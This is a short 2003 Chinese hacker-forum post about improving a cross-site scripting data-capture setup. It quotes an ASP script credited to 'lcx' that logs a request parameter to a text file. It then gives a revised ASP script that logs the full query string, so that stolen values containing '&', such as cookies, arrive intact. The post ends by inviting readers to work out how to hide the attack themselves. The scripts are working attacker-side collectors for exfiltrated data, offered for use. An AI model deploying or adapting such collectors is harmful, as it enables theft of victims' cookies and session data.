标题:
[原创]解决跨站脚本只能得到&前面信息的问题
[打印本页]
作者:
darkeyes
时间:
2003-11-23 17:44
标题:
[原创]解决跨站脚本只能得到&前面信息的问题
[这个贴子最后由darkeyes在 2003/11/23 07:53pm 第 1 次编辑] 今天一大早起来,准备花个把小时,实验一下跨站脚本,没想到一弄就是一天,5555555 因为用lcx的那段代码只能得到&号前面的信息,本来我也不知道,这是经过N次失败的经验, 先给出lcx的代码 <% testfile=Server.MapPath("lcx.txt") msg=Request("msg") fs=server.CreateObject("scripting.filesystemobject") set thisfile=fs.OpenTextFile(testfile,8,True,0) thisfile.WriteLine(""&msg& "") thisfile.close set fs = nothing %> 郁闷了一天,我翻书翻啊翻(书真是个好东东,:P),终于让我找到request.servervariables(QUERY_STRING)也一样可得到http请求中问号后的信息, 具体代码如下, <% testfile=Server.MapPath("darkeyes.txt") msg=request.servervariables("QUERY_STRING") set fs=server.CreateObject("scripting.filesystemobject") set thisfile=fs.opentextfile(testfile,8,true,0) thisfile.WriteLine(""&msg&"") thisfile.close set fs = nothing %> 这样就可以得到?号后完整的信息,而不再是不完整的了.至于利用的时候隐蔽性问题,俺就不多说了,自己去发挥吧,呵呵!
欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/)
Powered by Discuz! 7.2
